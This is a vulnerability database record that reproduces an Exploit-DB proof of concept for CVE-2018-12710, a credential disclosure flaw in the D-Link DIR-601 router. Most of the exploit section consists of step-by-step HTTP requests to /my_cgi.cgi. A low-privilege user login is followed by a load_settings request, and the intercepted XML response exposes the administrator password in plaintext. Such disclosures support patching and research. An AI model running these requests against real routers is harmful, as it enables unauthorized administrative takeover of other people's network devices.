ID
VAR-E-201808-0147
CVE
cve_id: | CVE-2018-12710 | Trust: 1.0 |
EDB ID
45306
TITLE
DLink DIR-601 - Credential Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
DLink DIR-601 - Credential Disclosure. CVE-2018-12710 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | dlink | model: | dir-601 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
# Exploit Title: DLink DIR-601 - Credential Disclosure
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.dlink.com
# Software Link: N/A
# Version: Firmware: 2.02NA Hardware Version B1
# Tested on: Windows 10 + Mozilla Firefox
# CVE : CVE-2018-12710
# 1. Description
# Being local to the network and having only "User" account (which is a low privilege account)
# access, an attacker can intercept the response from a POST request to obtain "Admin"
# rights due to the admin password being displayed in XML.
# 2. Proof of Concept
# Tools to use:
# - BurpSuite
# - Browser of your choice
# 3: Login with "User" role account:
*My "User" role account does not have a password in this example*
POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/login_real.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
DNT: 1
Connection: close
request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1
# 4: When logged into the access point, click on the Tools option
# 5: You should see a request similar to the following:
POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/tools_admin.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 277
DNT: 1
Connection: close
request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver
# 6: Right click on this request and choose "Do Intercept response from this request"
# 7: You will see a response similar to the following:
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:19:56 GMT
Server: lighttpd/1.4.28
Content-Length: 20088
<?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name>
<admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name>
<user_user_pwd></user_user_pwd><user_level>0 ...
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Credential Disclosure
Trust: 1.6
CREDITS
Kevin Randall
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 45306 | Trust: 1.6 |
db: | NVD | id: | CVE-2018-12710 | Trust: 1.0 |
db: | EDBNET | id: | 99136 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-12710 | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/45306/ | Trust: 0.6 |
SOURCES
db: | EXPLOIT-DB | id: | 45306 |
db: | EDBNET | id: | 99136 |
LAST UPDATE DATE
2022-07-27T09:18:16.750000+00:00
SOURCES RELEASE DATE
db: | EXPLOIT-DB | id: | 45306 | date: | 2018-08-30T00:00:00 |
db: | EDBNET | id: | 99136 | date: | 2018-08-30T00:00:00 |